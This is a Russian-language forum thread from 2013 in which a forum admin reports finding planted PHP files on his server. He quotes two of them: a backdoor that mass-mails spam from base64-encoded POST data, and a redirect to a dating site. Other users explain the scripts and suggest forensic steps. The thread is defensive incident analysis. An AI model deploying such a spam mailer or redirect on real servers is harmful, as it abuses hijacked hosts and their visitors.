ExBB Community :: Версия для печати

1. roma1 - 1 сентября 2013 — 19:58 - перейти к сообщению

пропал пользователь, я стал разбираться и полез по фтп в корень форума в папку с форумом, кроме файлов движка php я увидел штук 10 php файлов с безсмысленными названиями типа

Цитата:

wqrrpiw.php

с неким внутренним наполнением типа...

CODE:

<?php
if (isset($_POST['task']))
{

error_reporting(E_ALL);
ini_set('display_errors', TRUE);
ini_set('memory_limit', '512M');
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('set_time_limit',0);

$x = unserialize(base64_decode($_POST['task']));
if ($x==false) {exit();}

$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);

foreach ($x as $arr)
{
echo $arr['to']."\r\n";

$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);

mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
}
exit('SEND OK');
}

или...

CODE:

<?php

header('Location: http://datingvule.ru');

?>

кто подскажет как это понять? я то удалил эти файлы с папки с форумом, но кто знает нет ли их в подпапках, нет ли правок в истинных файлах движка Огорчение

я в полном смятении мягко сказать, пароль от фтп только у меня и может у хостера есть.

2. 1Bot - 2 сентября 2013 — 06:20 - перейти к сообщению

roma1
Прискорбно. Налицо все следы взлома. А вот причин может быть несколько: от подбора пароля к ftp, до прямого доступа в файловой системе хостера одним из таких же как Вы пользователей, ну и через форум возможно так сделать при наличии определенных прав доступа.

А вот файлы с дырами зря удалили - их надо бы изучать (хотя бы скопировать к себе для изучения после удаления), чтобы понять кто, что и зачем так сделал - от хостера рекомендую взять логи apache за последнюю неделю и посмотреть откуда к этим файлам обращались, ну и ежедневные архивы просмотреть на предмет определения даты когда эти файлы появились.
(Добавление)
roma1
Первый скрипт используется для массовой рассылки писем (спама скорее всего), второй - для перенаправления на сайт, возможно рекламный.

3. roma1 - 2 сентября 2013 — 06:46 - перейти к сообщению

ну вот в этих 11 файлах только то что я скопировал выше и ничего более, только файлы с разными безсмысленными названиями, пять файлов с кодом выше и шесть с тем что ниже я скопировал. Файлы есть но в движке оставлять я побоялся. Права на папку с форумом 750 стоят, куда уже более строго?

1Bot пишет:

ну и через форум возможно так сделать при наличии определенных прав доступа.

об этом я не знаю даже как Огорчение

стукну к хостеру но боюсь они так с правами намутят что опять форум ляжет.

4. 1Bot - 2 сентября 2013 — 06:59 - перейти к сообщению

roma1
Еще нужно было у тех удаленных файлов посмотреть дату создания, владельца и права на эти файлы - тоже бы кое-что прояснилось.
А бекапы то есть ежедневные?

5. roma1 - 2 сентября 2013 — 07:40 - перейти к сообщению

бекап есть с файлами и вижу что числа с 22 прошлого месяца где то через день создавались эти файлы по дате в архиве. Вчера был создан последний но вчера выкачал бекап и сменил пароль к фтп сегодня посмотрю не будет ли новых файлов.

хм. если бы кто влез через фтп, он мог снести всё и повредить форум, врятли стал подбрасывать левые файлы регулярно.
(Добавление)
Где то на форуме нашли дыру скорее всего.

6. - 2 сентября 2013 — 07:48 - перейти к сообщению

Цитата:

он мог снести всё и повредить форум, врятли стал подбрасывать левые файлы

А какая коммерческая выгода от простого сноса форума? Значительно выгоднее от вас спам рассылать.

7. 1Bot - 2 сентября 2013 — 08:12 - перейти к сообщению

roma1 пишет:

числа с 22 прошлого месяца где то через день создавались эти файлы по дате в архиве

Возьмите у хостера логи apache за это число и определите по ним, с какого IP вызывались эти скрипты и потом по IP нужно посмотреть файлы форума, которые вызывал тот же пользователь - в них и искать уязвимость, да и права на основную папку с форумом в ту дату нужно смотреть.